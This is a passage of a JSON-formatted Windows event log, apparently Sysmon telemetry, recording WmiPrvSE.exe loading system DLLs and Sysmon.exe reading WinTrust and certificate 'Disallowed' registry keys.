- }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software 
Publishing", - "timestamp": 131883573479330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "esentprf.dll", - "image_path": "C:\\Windows\\System32\\esentprf.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479330000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "secur32.dll", - "image_path": "C:\\Windows\\System32\\secur32.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479480000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573479480000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479480000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479480000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - 
"image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479480000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479480000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479480000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "dnsapi.dll", - "image_path": "C:\\Windows\\System32\\dnsapi.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573479640000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": 
"Disallowed", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cryptsp.dll", - "image_path": "C:\\Windows\\System32\\cryptsp.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": 
"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479790000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479790000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "wkscli.dll", - "image_path": "C:\\Windows\\System32\\wkscli.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479950016, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "cscapi.dll", - "image_path": "C:\\Windows\\System32\\cscapi.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479950016, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479950016, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "msdtcuiu.dll", - "image_path": "C:\\Windows\\System32\\msdtcuiu.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479480000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "browcli.dll", - "image_path": "C:\\Windows\\System32\\browcli.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": 
"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479950016, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "atl.dll", - "image_path": "C:\\Windows\\System32\\atl.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "msdtcprx.dll", - "image_path": "C:\\Windows\\System32\\msdtcprx.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "mtxclu.dll", - "image_path": "C:\\Windows\\System32\\mtxclu.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479790000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - 
"registry_value": "Software Publishing", - "timestamp": 131883573480259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "winspool.drv", - "image_path": "C:\\Windows\\System32\\winspool.drv", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480259984, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - 